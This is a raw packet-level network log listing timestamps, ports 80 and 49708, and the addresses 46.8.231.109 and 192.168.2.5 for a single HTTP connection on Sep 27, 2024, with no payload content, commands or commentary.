Sep 27, 2024 00:15:04.424078941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.424093008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.424107075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.424110889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.424119949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.424122095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.424144983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.424156904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.424263954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.424279928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.424309969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.424490929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425205946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425230980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425246000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425290108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425290108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425324917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425338984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425354004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425369024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425374031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425421000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425421000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425508022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425523043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425542116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425556898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425569057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425569057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425570965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425585985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425594091 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425607920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425609112 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425621986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425647974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425656080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425693989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425705910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425805092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425820112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425833941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425848007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425862074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425874949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425874949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425877094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425892115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425905943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425920010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425924063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425924063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425935030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425950050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.425978899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.425978899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426035881 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426042080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426090956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426156998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426172972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426202059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426238060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426253080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426253080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426269054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426284075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426296949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426296949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426328897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426328897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426373005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426388025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426400900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426414967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426415920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426430941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426445007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426448107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426448107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426460028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426475048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426489115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426497936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426497936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426557064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426595926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426609993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426628113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426675081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426675081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426748991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426764965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426779032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426793098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426794052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426812887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426827908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426831961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426837921 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426845074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426860094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.426892996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426892996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426945925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.426985025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427000046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427014112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427028894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427042961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427042961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427043915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427076101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427076101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427079916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427094936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427119970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427119970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427156925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427181005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427196980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427212000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427227020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427232981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427233934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427241087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427254915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427268028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427268028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427269936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427284956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427301884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427350998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427360058 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427362919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427377939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427398920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427412987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427412987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427481890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427491903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427505970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427520037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427548885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427548885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427582979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427597046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427611113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427625895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427627087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427627087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427639961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427654982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427656889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427656889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427685976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427706957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427721977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427730083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427738905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.427767038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427767038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.427809954 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.509768009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509799004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509814024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509865999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509886026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509901047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509917021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509917021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.509932995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509944916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.509973049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.509977102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.509977102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.509994030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510010004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510024071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510026932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510040045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510046005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510046005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510054111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510068893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510087967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510087967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510147095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510677099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510699987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510713100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510732889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510745049 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510765076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510780096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510793924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510795116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510807037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510828018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510875940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510876894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510890007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510905981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.510932922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510932922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.510951996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.511007071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.511019945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.511034966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.511043072 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.511049986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.511064053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.511065006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.511080027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.511082888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.511096001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.511113882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.511135101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512187958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512203932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512217999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512263060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512267113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512267113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512284994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512300014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512314081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512314081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512330055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512360096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512360096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512392044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512408972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512423992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512454033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512464046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512526989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512542009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512556076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512569904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512584925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512590885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512590885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512598991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512625933 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512648106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512685061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512698889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512712955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512726068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512741089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512741089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512741089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512756109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512769938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512769938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512789965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512800932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512829065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512846947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512861967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512876034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512886047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512886047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512891054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512904882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512919903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.512926102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512926102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512960911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.512984037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513055086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513082027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513098001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513112068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513127089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513139963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513139963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513142109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513158083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513171911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513171911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513190985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513227940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513233900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513247967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513262987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513278008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513279915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513279915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513292074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513305902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513320923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513320923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513350010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513350010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513530016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513545036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513566971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513581038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513592958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513592958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513596058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513611078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513626099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513627052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513627052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513641119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513673067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513689995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513704062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513716936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513717890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513727903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513731956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513746023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513757944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513758898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513773918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513787985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513797045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513797045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513823986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513864040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513902903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513911009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513917923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513951063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513951063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:04.513967991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.513991117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:04.514004946 CEST	80	49708	46.8.231.109	192.168.2.5
